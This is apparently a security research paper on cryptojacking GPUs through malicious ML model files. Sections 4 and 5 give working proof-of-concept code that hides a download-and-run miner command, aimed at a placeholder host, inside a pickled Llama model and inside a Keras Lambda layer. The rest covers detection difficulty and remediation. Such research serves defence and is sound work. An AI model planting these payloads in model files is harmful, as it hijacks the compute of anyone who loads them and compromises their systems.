# Crypto Miner Attack: GPU Remote Code Execution Attacks

Ariel Szabo, Uzy Hadad

nextsec.ai

{ariel.szabo,uzy.hadad}@nextsec.ai

## Abstract

Remote Code Execution (RCE) exploits pose a significant threat to AI/ML systems, particularly in GPU-accelerated environments where the computational power of GPUs can be misused for malicious purposes. This paper focuses on RCE attacks leveraging deserialization vulnerabilities and custom layers, such as TensorFlow's Lambda layers, which are often overlooked due to the complexity of monitoring GPU workloads. These vulnerabilities enable attackers to execute arbitrary code, blending malicious activity seamlessly into expected model behavior and exploiting GPUs for unauthorized tasks such as cryptocurrency mining. Unlike traditional CPU-based attacks, the parallel processing nature of GPUs and their high resource utilization make runtime detection exceptionally challenging.

In this work, we provide a comprehensive examination of RCE exploits targeting GPUs, demonstrating an attack that utilizes these vulnerabilities to deploy a crypto miner on a GPU. We highlight the technical intricacies of such attacks, emphasize their potential for significant financial and computational costs, and propose strategies for mitigation. By shedding light on this underexplored attack vector, we aim to raise awareness and encourage the adoption of robust security measures in GPU-driven AI/ML systems, with emphasis on static and model scanning as an easier way to detect exploits.

## 1. Introduction

Security has always been a cornerstone of technology, protecting systems from unauthorized access, malicious actions, and unintentional damage. With the rapid evolution of Artificial Intelligence (AI) and Machine Learning (ML), security has taken on new dimensions, becoming critical to ensure the safe and reliable operation of these systems. AI security matters because AI is not merely a set of algorithms; it is a transformative technology that influences decision-making in critical sectors such as healthcare, finance, transportation, and defense. Vulnerabilities in AI systems can lead to catastrophic consequences, from financial losses to compromised national security (Comiter., 2019).

The importance of AI security has grown in parallel with the rise of open-source AI frameworks and the commoditization of AI technologies. Open-source AI projects have democratized access to powerful tools and models, enabling innovation at an unprecedented scale. However, this openness has also introduced new risks. Publicly available AI models and tools can be exploited by malicious actors to embed vulnerabilities, manipulate behavior, or launch attacks. Additionally, the commoditization of AI - where AI systems are packaged as ready-to-use products—has created a false sense of security, often overshadowing the need for robust safeguards.

One of the most pressing challenges in AI security is that it is frequently overlooked. Unlike traditional software systems, AI systems are inherently complex, relying on vast datasets and intricate models that are difficult to audit and secure. The non-deterministic nature of AI models further complicates the task, as small changes in input data or configurations can lead to unpredictable outcomes. Furthermore, the rapid pace of AI development often prioritizes performance and innovation over security, leaving vulnerabilities unaddressed. For example, companies racing to deploy AI solutions may lack the resources or expertise to thoroughly evaluate potential risks, resulting in systems that are both powerful and vulnerable.

In this new era of AI as a commodity, the consequences of overlooking security are far-reaching. Vulnerabilities in AI systems can undermine trust, compromise privacy, and even cause physical harm in safety-critical applications. For instance, adversarial attacks that deceive self-driving cars or tamper with medical diagnosis systems can have life-threatening implications. Additionally, as AI becomes integrated into global supply chains and critical infrastructure, its vulnerabilities can be exploited to disrupt entire industries or national economies.

Addressing AI security requires a paradigm shift in how these systems are developed, deployed, and maintained. It calls for collaboration between researchers, industry practitioners, and policymakers to create a robust ecosystem that prioritizes security at every stage. By acknowledging the unique challenges of AI security and committing to proactive measures, we can harness the transformative power of AI while safeguarding against its potential risks.

Among the known attacks on AI models is the remote code execution attacks which provide a new set of challenges when it comes to GPU computation. Detecting GPU-based attacks on AI neural network models is difficult because GPUs execute tasks in parallel, making it harder to spot unusual activity. Malicious code can spread across many GPU cores, bypassing traditional detection systems that focus on CPU-based processes. This is especially problematic because GPUs are far more expensive and resource-intensive than CPUs, meaning an attack not only compromises security but also wastes valuable computational resources. The lack of specific GPU monitoring further complicates detection, allowing attacks to go unnoticed until significant damage occurs.

## 2. Related Work

Deserialization attacks, which became known in 2006 (Schoenefeld., 2006), exploit the process of reconstructing objects from serialized data, which, when mishandled, can lead to severe security exploits, including Remote Code Execution (RCE). Research on the topic gained popularity and in 2017 it climbed to eight place on OWASP Top 10 (Owasp, 2017;Schneider., 2020).

A seminal study by Fingann (Fingann.,2020),provides an in-depth analysis of Java deserialization vulnerabilities. Building upon this, Gauthier and Bae (Gauthier et al., 2022) proposed a novel approach to prevent deserialization attacks at runtime. They introduced a lightweight method utilizing Markov chains to detect malicious deserialization behavior during execution.
Additionally, a study by Wanigathunga (Wanigathunga., 2021) on remote execution via insecure deserialization demonstrated how an intruder could execute arbitrary code on a remote machine by chaining techniques for uncontrolled file upload. This research underscores the critical nature of securing deserialization processes to prevent RCE attacks.
The integration of AI models into various applications has introduced new vectors for RCE attacks.

Numerous studies have explored the security challenges associated with AI and ML. Previous works have highlighted vulnerabilities such as adversarial attacks (Goodfellow et al., 2015 ), poisoning attacks (Biggio et al., 2012 ), and backdoors in neural networks (Gu et al., 2017 ) and architectural backdoors (Bober-Irizar et al., 2022). Carlini et al. (2017) provided insights into adversarial examples and their impact on model robustness (Carlini et al., 2017), while Sayar (Sayar et al., 2022) shed light on deserialization vulnerabilities in large-scale software systems (Sayar, et al. 2022). A recent study, Liu (Liu et al., 2024), highlighted the potential for RCE vulnerabilities in applications that incorporate Large Language Models (LLMs). Frameworks like LangChain, which facilitate the development of LLM-integrated applications, offer code execution utilities for custom actions (Liu at el., 2024). However, these capabilities can theoretically inadvertently introduce RCE vulnerabilities, especially when prompt injections are exploited.

Further emphasizing the risks, a report by Reiner from CyberArk (Reiner., 2024) detailed how advanced LLMs, when granted extensive capabilities, could be manipulated to execute malicious code. The study underscored the importance of implementing robust security measures when integrating LLMs into applications to prevent potential RCE exploits.

Collectively, these studies highlight the evolving landscape of security threats associated with deserialization that enable RCE vulnerabilities. They underscore the necessity for continuous research and the implementation of proactive security measures to safeguard systems, especially as AI models become increasingly integrated into various applications.

# 3. Background

## 3.1 Introduction to AI and ML

Artificial Intelligence (AI) refers to the simulation of human intelligence by machines, while Machine Learning (ML) is a subset of AI that involves training algorithms to learn from data and make predictions or decisions. These systems rely on vast amounts of data and computational power to function effectively. For example, ML models are commonly used in applications like image recognition, language translation, and recommendation systems.

AI and ML models function through intricate processes involving data ingestion, training, and inference. During training, models identify patterns in data, forming the basis for making predictions. For instance, a spam classifier might analyze millions of emails to differentiate between legitimate and spam messages based on learned features. However, the reliance on large-scale datasets introduces challenges, such as ensuring data integrity and securing the training environment from adversaries.

## 3.2 Overview of Security in AI and ML

Security in AI and ML involves protecting systems from unauthorized access, data manipulation, and malicious activities. The primary attack vectors include:

- **Architectural Backdoors**: Malicious modifications introduced during model development and design.
- **Data Poisoning**: Injecting harmful data into the training dataset.
- **Prediction Adversarial attacks:** introducing maliciously designed data to deceive an already trained model into making errors.
- **Remote Code Execution (RCE)**: Exploiting software flaws to execute arbitrary code. RCE is mainly exploited using deserialization attacks - Leveraging unsafe serialization processes to execute malicious code.

## 3.3 Remote Code Execution

Remote code execution (RCE) occurs when an attacker exploits a vulnerability to run arbitrary code on a target system. In AI systems, RCE could target API endpoints or dependencies used by ML frameworks. For example, an outdated library with a known vulnerability could serve as an entry point for RCE attacks. In a cloud-based ML environment, RCE could allow attackers to access sensitive data, tamper with models, or disrupt operations.

## 3.4 Vulnerabilities in models: Deserialization and Custom Layers

There are two main vulnerabilities that allow in RCE attacks in AI/ML models:

1. Leveraging deserialization attacks, where malicious code is embedded within serialized model files or data, which is then executed upon deserialization.
2. exploiting custom layers in deep learning frameworks, such as TensorFlow's Lambda layer, which allows arbitrary code to be executed as part of model computations.

Serialized data is often used to store and transmit information efficiently. When deserialization is performed on untrusted input without proper validation, attackers can craft payloads that execute malicious code. This is particularly relevant in AI systems that rely on serialization for data exchange or model storage.

For example, a compromised AI application might include serialized models containing malicious commands. When the model is loaded, the application unknowingly executes the embedded payload. Modern AI/ML frameworks often include serialization tools like Pickle in Python, which are highly susceptible to such attacks if misused. Replacing unsafe serialization formats with secure alternatives such as "safetensors" or employing sandboxing techniques during deserialization are effective countermeasures.

In addition, many open-source machine learning (ML) and artificial intelligence (AI) frameworks, such as TensorFlow, provide flexible customization options to facilitate diverse computational needs. One such feature is the ability to define custom layers, such as TensorFlow's Lambda layer, which allows users to implement custom computations directly within their models. While this functionality is invaluable for advancing research and addressing unique use cases, it also introduces significant security risks. If untrusted or malicious code is embedded within these custom layers, attackers can exploit this feature to execute arbitrary commands on the host system, leading to remote code execution (RCE).

### 3.5 The Uniqueness of GPU Exploitation

Modern artificial intelligence (AI) models, particularly those based on deep learning, are designed to handle vast amounts of data and complex mathematical operations. These models often include architectures like neural networks and transformers, both of which rely on high computational power to function effectively. With the increasing scale and complexity of AI models, GPUs (Graphics Processing Units) have become a crucial part of AI workflows due to their parallel processing capabilities, making them well-suited for the demands of deep learning tasks.

One of the key challenges with securing GPU-based systems is the relative lack of monitoring compared to traditional CPU-based workloads. While CPUs are typically the focus of security tools and anomaly detection systems, GPUs are often overlooked or inadequately monitored. Most security tools and monitoring systems are designed to track CPU usage, looking for unusual activity such as spikes in resource consumption, unexpected code execution, or unauthorized access patterns. However, these tools are not always equipped to monitor the parallel processing power of GPUs.

GPUs are a critical but costly resource for organizations relying on AI and high-performance computing. When GPU computations are compromised—whether through unauthorized use, cryptojacking, or malicious attacks—the financial impact can be substantial. Organizations may face increased costs due to wasted GPU cycles, reduced availability of resources for legitimate tasks, and the need for extensive remediation efforts, all of which can disrupt workflows and undermine operational efficiency.

**In our work, we focus on remote code execution using deserialization and custom layers attacks on GPUs, which have not been as extensively studied.** Specifically, the payload launches a cryptocurrency mining process, showcasing how attackers can exploit the computational power of GPUs for unauthorized resource utilization.

This type of attack, known as **cryptojacking**(Lachtar et al., 2020), has been observed in cloud-based environments, where attackers gain unauthorized access to cloud instances and use the GPUs for their own profit to perform the hash calculations required for mining coins.

# 4. Analysis of Remote Code Execution on GPU Using Deserialization Attacks

This section demonstrates an attack that utilizes deserialization vulnerabilities to run a crypto miner on GPU.

The exploit leverages Python's pickle.load (similar to PyTorch's torch.load) function, which is commonly used to deserialize saved model objects. The vulnerability arises when the function deserializes objects from an untrusted source without validating the input. Attackers can craft a serialized payload that includes malicious Python code, which is executed during deserialization.

Below is a Python code snippet illustrating how a pre-trained LLM model can be modified to include a malicious payload. When deserialized using pickle.load, the payload is executed:

- **Creating The Valid Model:** Using Meta's Llama 3.3 multilingual large language model (LLM) pre-trained from HuggingFace as the valid base model.

```Python
from transformers import AutoModelForCausalLM

llama_model = AutoModelForCausalLM.from_pretrained("meta-llama/Llama-3.3-70B-Instruct")
```

- **Defining Malicious Behavior**: The MaliciousCode class overrides the __reduce__ method, which controls how the object is serialized. This method is used to embed a system command (os.system) as the payload. This code specifically targeted Linux systems, downloading and executing XMRig (a high performance, open source, unified CPU/GPU miner) payload.

```Python
import os
```

```python
class MaliciousCode:
    def __reduce__(self):
        return os.system, ("wget https://github.com/malicious_user/malicious_crypto_gpu_miner/releases/download/v1.2.2/malicious-crypto-gpu-miner.tar.gz && tar -xzf malicious-crypto-gpu-miner.tar.gz && cd malicious-crypto-gpu-miner && nohup ./mine &",)
```

- **Crafting the Payload**: Using a custom InjectablePickler object, the pickle.dump function is used to serialize the malicious object into a file (malicious_model.pickle).

```python
import pickle
from io import BytesIO

class InjectablePickler(pickle._Pickler):
    def __init__(self, bytes_io: BytesIO, object_to_inject: object):
        super().__init__(bytes_io, protocol=4)
        self.object_to_inject: object = object_to_inject

    def dump(self, obj):
        self.framer.start_framing()
        self.save(self.object_to_inject)
        self.save(obj)
        self.write(pickle.STOP)
        self.framer.end_framing()

bytes_io = BytesIO()
injectable_pickler = InjectablePickler(bytes_io, object_to_inject=MaliciousCode())
injectable_pickler.dump(
    llama_model  # you can add here any model you build or download
)

with open("malicious_model.pickle", "wb") as file:
    file.write(bytes_io.getvalue())
```

- **Exploiting Deserialization**: When pickle.load is called to load the serialized model, the __reduce__ method is triggered.

```python
import pickle
with open("malicious_model.pickle", "rb") as file:
    model = pickle.load(file)
# at this point the system is exploited
```

# 5. Analysis of Remote Code Execution on GPU Using Lambda Layer

This section, like the previous one, provides an example of how to create a crypto-miner GPU based remote code execution attack using vulnerabilities in the Tensoflow's Lambda layer.

Below is a Python code snippet illustrating how a Tensorflow's Keras model can be modified to include a malicious code inside a Lambda layer. When the model is used the code is executed:

- **Creating The Model With Malicious Behavior:** Define a simple feedforward neural network using the Sequential API in Keras. In the Lambda layer we define a simple function ensuring the model continues to function properly by passing the input tensor through without modifications. This allows the malicious function to operate stealthily while still appearing as a valid layer in the model. The malicious code specifically targeted Linux systems, downloading and executing XMRig (a high performance, open source, unified CPU/GPU miner) payload.

```python
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Lambda
import os

model = Sequential([
    Dense(10, input_shape=(20,), activation='relu'),
```

```python
    Lambda(lambda x: os.system("wget https://github.com/malicious_user/malicious_crypto_gpu_miner/releases/download/v1.2.2/malicious-crypto-gpu-miner.tar.gz && tar -xzf malicious-crypto-gpu-miner.tar.gz && cd malicious-crypto-gpu-miner && nohup ./mine &") or x),
    Dense(1, activation='sigmoid')
])

model.save("malicious_model.h5")
```

- **Exploiting**: When load_model is called to load the serialized model, the malicious code is triggered and also when the model is used to predict on new data the malicious method is triggered.

```python
import tensorflow as tf
loaded_model = tf.keras.models.load_model("malicious_model.h5")
loaded_model.predict(data)
# at this point the system is exploited
```

## 6. Challenges in Detecting GPU-based Attacks

In both examples, using Tensorflow's Lambda layer and using Pickle/Pytorch deserialization, the detection of GPU-based attacks on AI neural network models is particularly challenging due to the nature of GPU computations. When a neural network model is loaded from serialized data (e.g., a saved model file), it can be a vector for attackers to inject malicious code or manipulate model parameters without triggering obvious signs of intrusion. AI/ML Models are expected to use GPU-intensive computations, so a malicious code, offloading tasks from the CPU to the GPU would seem normal and expected making it challenging to distinguish malicious code from normal workloads. Since GPUs process tasks in parallel, the attack can spread across thousands of GPU cores, making it difficult to identify through traditional monitoring tools designed for sequential CPU-based activities. Furthermore, the parallel execution of computations, coupled with the lack of GPU-specific monitoring, allows these attacks to execute at scale and evade detection mechanisms that focus on conventional system behavior, leaving the attack largely undetected until significant damage has occurred.

## 7. Remediation Strategies

Mitigating the risks of GPU-based Remote Code Execution (RCE) and deserialization attacks in AI/ML systems necessitates a comprehensive, layered approach that integrates prevention, monitoring, and response mechanisms. One of the most effective preventive measures is enforcing secure deserialization practices. By ensuring that all serialized models conform to strict validations and originate from trusted sources, organizations can reduce the risk of malicious payloads being injected into the system. The use of cryptographic signatures to verify the integrity and authenticity of serialized files further strengthens this approach, while automated scanning tools provide an additional safeguard by detecting embedded malicious code or unexpected alterations.

The risks associated with custom computations, such as TensorFlow's Lambda layers, can be mitigated by minimizing their use in production environments and instead relying on pre-built, framework-supported operations. Where custom layers are unavoidable, thorough code audits are essential to identify and eliminate vulnerabilities. Additionally, organizations must adopt strict controls over object mapping during deserialization, explicitly defining safe mappings to avoid inadvertently executing unsafe code. Here, as well, automated scanning tools can provide an additional safety from malicious code.

Another critical component of remediation is the implementation of isolated execution environments to confine potential exploits. Containerization platforms, such as Docker, and GPU sandboxing techniques can effectively isolate GPU workloads, ensuring that malicious activities remain contained and do not compromise the broader system. Resource quotas should also be enforced to prevent exploitation of GPU resources for denial-of-service attacks or other malicious purposes.

Dependency and patch management play a crucial role in securing AI/ML frameworks. Regular updates to GPU drivers, libraries, and frameworks help address vulnerabilities present in older versions. Automated tools can assist in auditing dependencies, identifying outdated or insecure components, and streamlining remediation efforts. Additionally, reducing the overall attack surface by removing unnecessary libraries further enhances security.

To address the monitoring gap for GPU workloads, organizations should employ tools designed to analyze GPU-specific activities, such as memory access patterns and computational behaviors. Anomaly detection systems leveraging AI techniques can identify deviations from normal workloads, providing early indications of malicious activity. Detailed logging of model-loading processes, including deserialization events and resource utilization, is also essential for forensic analysis and incident detection.

Finally, fostering a culture of security awareness within AI/ML teams is vital for long-term risk mitigation. Providing secure coding training, particularly in handling serialized models and custom computations, equips developers with the knowledge to reduce vulnerabilities. Proactive threat modeling exercises help identify potential attack vectors and prioritize mitigation strategies. Collaboration between AI practitioners and cybersecurity teams ensures that security is embedded throughout the AI development lifecycle.

Despite these preventive measures, organizations must prepare to respond effectively to incidents. Predefined rollback mechanisms enable swift recovery from compromised models, while regular data backups ensure the ability to restore critical systems. Post-incident analysis is equally important, offering insights into the root causes of breaches and facilitating continuous improvement of security practices. By adopting a holistic remediation strategy, organizations can balance the flexibility of AI/ML development with the stringent security required to protect computational resources and sensitive data.

## 8. Conclusion

Remote Code Execution (RCE) exploits leveraging deserialization vulnerabilities and custom Lambda layer attacks present significant challenges in the context of GPU-accelerated AI/ML workloads. The inherent complexity of GPU monitoring, coupled with the seamless integration of malicious code into expected computational workflows, makes these vulnerabilities particularly insidious. Unlike traditional CPU-centric attacks, where runtime monitoring can often detect anomalous behavior, the parallel and resource-intensive nature of GPU computations obscures signs of exploitation, allowing malicious operations to blend into legitimate workloads.

This underscores the critical importance of proactive security measures during the model development and deployment lifecycle. Static analysis techniques, such as scanning serialized models and auditing custom layers, are far more effective in identifying potential vulnerabilities than relying solely on runtime detection. By prioritizing these pre-deployment strategies, organizations can mitigate the risks associated with RCE exploits, ensuring that AI systems remain secure and reliable in their computational environments. In a landscape increasingly reliant on GPU-powered AI/ML, the adoption of rigorous static analysis tools and secure coding practices must become foundational to AI/ML security frameworks.

# References

- Schoenefeld, M. (2006). Pentesting Java/J2EE, finding remote holes. https://archive.conference.hitb.org/hitbsecconf2006kl/materials/DAY%201%20-%20Marc%20Schoenefeld%20-%20Pentesting%20Java%20J2EE.pdf
- Biggio, B., et al. (2012). Poisoning attacks against support vector machines. https://arxiv.org/abs/1206.6389
- Goodfellow, I., et al. (2015). Explaining and harnessing adversarial examples. https://arxiv.org/abs/1412.6572
- Carlini, N., et al. (2017). Towards evaluating the robustness of neural networks. https://ieeexplore.ieee.org/abstract/document/7958570
- Owasp.Org. (2017). OWASP Top 10 Application Security Risks - 2017. https://owasp.org/www-project-top-ten/2017/Top_10.html
- Gu, T., et al. (2017). Badnets: Identifying vulnerabilities in the machine learning model supply chain. https://arxiv.org/abs/1708.06733
- Comiter, M. (2019). Attacking Artificial Intelligence: AI's Security Vulnerability and What Policymakers Can Do About It. https://www.belfercenter.org/publication/AttackingAI
- Fingann. (2020). Java Deserialization Vulnerabilities Exploitation Techniques and Mitigations. https://www.duo.uio.no/bitstream/handle/10852/79730/Master-Thesis---Java-Deserialization-Vulnerabilities---Sondre-Fingann.pdf
- Schneider, C. (2020). Java Deserialization Security FAQ. https://www.christian-schneider.net/blog/java-deserialization-security-faq/
- Wanigathunga. (2021). Secure Software Engineering - Remote Execution via Insecure Deserialization. https://www.researchgate.net/publication/356423630_Secure_Software_Engineering_-_Remote_Execution_via_Insecure_Deserialization
- Bober-Irizar, et al. (2022) Architectural Backdoors in Neural Networks https://arxiv.org/abs/2206.07840

- Gauthier and Bae. (2022). Runtime Prevention of Deserialization Attacks. https://arxiv.org/abs/2204.09388
- Sayar, et al. (2022). An In-depth Study of Java Deserialization Remote-Code Execution Exploits and Vulnerabilities. https://dl.acm.org/doi/abs/10.1145/3554732
- Liu at el. (2024). Demystifying RCE Vulnerabilities in LLM-Integrated Apps. https://arxiv.org/html/2309.02926v3
- Reiner. (2024). Anatomy of an LLM RCE. https://www.cyberark.com/resources/threat-research-blog/anatomy-of-an-llm-rce
- Lachtar, Nada; Elkhail, Abdulrahman Abu; Bacha, Anys; Malik, Hafiz (2020-07-01). "A Cross-Stack Approach Towards Defending Against Cryptojacking". *IEEE Computer Architecture Letters*. **19** (2): 126–129.